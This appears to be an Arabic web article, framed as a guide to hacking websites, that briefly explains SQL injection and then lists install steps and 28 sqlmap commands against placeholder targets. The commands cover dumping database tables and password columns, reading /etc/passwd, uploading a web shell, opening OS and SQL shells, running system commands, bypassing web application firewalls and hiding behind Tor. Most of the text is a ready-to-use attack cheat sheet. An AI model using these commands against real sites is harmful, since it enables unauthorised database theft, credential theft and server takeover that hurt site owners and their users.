أوامر اختراق الموقع عن طريق اداة SQLMAP لاستغلال حقن SQL
لغة الاستعلامات الهيكلية ، والتي تُعرف باسم SQL ، هي لغة البرمجة الشائعة التي تسطرها معظم أنظمة إدارة قواعد البيانات. يوفر طريقة شائعة للتطبيق للوصول إلى البيانات الموجودة في قاعدة البيانات باستخدام مجموعة مشتركة من الأوامر التي يمكن لقاعدة البيانات فهمها.
يستغل المهاجمون قواعد البيانات هذه بجعلهم يخرجون معلومات لا ينبغي لهم عرضها. أحيانًا يكون هذا بسيطًا مثل المهاجم الذي يطلب معلومات مميزة من نظام إدارة قاعدة البيانات . في أحيان أخرى ، يستفيد من التكوينات الضعيفة من قبل مسؤولي قواعد البيانات.
من الاستطلاع إلى تغطية المسارات - 5 مراحل للقرصنة الأخلاقية
من الألف إلى الياء - مؤشر ثغرات الويب - معيار OWASP
من الألف إلى الياء - مجموعة أدوات الأمن السيبراني
قد يستفيد المهاجمون أيضًا من ثغرة أمنية في نظام إدارة قاعدة البيانات تسمح للمهاجم بعرض أو كتابة أوامر مميزة من قاعدة البيانات وإليها.
تقوم Sqlmap بأتمتة عملية اكتشاف واستغلال الثغرات الأمنية لحقن SQL والاستيلاء على خوادم قواعد البيانات. يأتي Sqlmap مزودًا بمحرك كشف ، بالإضافة إلى مجموعة واسعة من ميزات اختبار الاختراق (PT) التي تتراوح من بصمة قاعدة البيانات إلى الوصول إلى نظام الملفات الأساسي وتنفيذ الأوامر على نظام التشغيل عبر اتصالات خارج النطاق.
اوامر تثبيت الاداةsqlmap
pkg update -y
pkg install git python2 -y
git clone https://github.com/sqlmapproject/sqlmap.git
لمسح الموقع المصاب مسح كامل
python2 sqlmap.py -u url --all
الصيغة الأساسية لاستخدام Sqlmap هي:
sqlmap -u URL - - وظيفة
فيما يلي قائمة بأهم أوامر SQLMAP المفيدة التي يمكنك استخدامها ضد هدفك الضعيف:
1. طلب الحصول على
sqlmap -u http://example.com/page.php?id=1 --dbs
2. من ملف
sqlmap -r request.txt
3. الاختبار باستخدام نمط عناوين URL
sqlmap -u http://example.com/page/*/view --dbs
4. طلب POST
sqlmap -u http://example.com/login.php --data "username=admin&pass=admin&submit=submit" -p username
5. استخدام ملفات تعريف الارتباط
sqlmap -u http://example.com/enter.php --cookie="PHPSESSID=45634b63g643f563456g4356g" -u http://example.com/index.php?id=1
6. استخراج قواعد البيانات (تعداد قاعدة البيانات)
sqlmap -u http://example.com/page.php?id=1 --dbs
7. تحديد قاعدة البيانات الحالية
sqlmap -u http://example.com/page.php?id=1 --current-db
8. استخراج الجداول
sqlmap -u http://example.com/page.php?id=1 -D database --tables
9. استخراج الأعمدة
sqlmap -u http://example.com/page.php?id=1 -D database -T table_name --columns
10. إغراق البيانات
sqlmap -u http://example.com/page.php?id=1 -D database -T table_name -C colum1,column2 --dump
11. تعدد
sqlmap -u http://example.com/page.php?id=1 --dbs --threads 5
12. لا يوجد اتصال
sqlmap -u http://example.com/page.php?id=1 --dbs --null-connection
13. اتصال HTTP المستمر
sqlmap -u http://example.com/page.php?id=1 --dbs --keep-alive
14. إخراج التنبؤ
sqlmap -u http://example.com/page.php?id=1 -D database -T user -c users,password --dump --predict-output
15. فحص الامتيازات
sqlmap -u http://example.com/page.php?id=1 --privileges
16. قراءة الملفات من الخادم
sqlmap -u http://example.com/page.php?id=1 --file-read=/etc/passwd
17. تحميل الملفات / شل
sqlmap -u http://example.com/page.php?id=1 --file-write=/root/shell.php --file-dest=/var/www/shell.php
18. SQL شل
sqlmap -u http://example.com/page.php?id=1 --sql-shell
19. قذيفة نظام التشغيل
sqlmap -u http://example.com/page.php?id=1 --os-shell
20. إكس أمر نظام التشغيل بدون تحميل شل
sqlmap -u http://example.com/page.php?id=1 --os-cmd "uname -a"
21. باستخدام الوكيل
sqlmap --proxy="127.0.0.1:8080" -u http://example.com/page.php?id=1 --dbs
22. استخدام الوكيل مع أوراق الاعتماد
sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u http://example.com/page.php?id=1
23. الزحف
sqlmap -u http://example.com/ --crawl=1
24. الاستغلال في وضع الإسهاب
sqlmap -u http://example.com/page.php?id=1 -v 3
25. تجاوز WAF (جدار حماية تطبيق الويب)
sqlmap -u http://example.com/page.php?id=1 --tamper=apostrophemask
26. مسح صفحة المصادقة القائمة على المفتاح
sqlmap -u http://example.com/page.php?id=1 --auth-file=
27. لاستخدام شبكة TOR الافتراضية
sqlmap -u http://example.com/page.php?id=1 --tor
28. المسح مع ارتفاع المخاطر والمستوى
sqlmap -u http://example.com/page.php?id=1 --level=3 --risk=5
تعليقات: (0) إضافة تعليق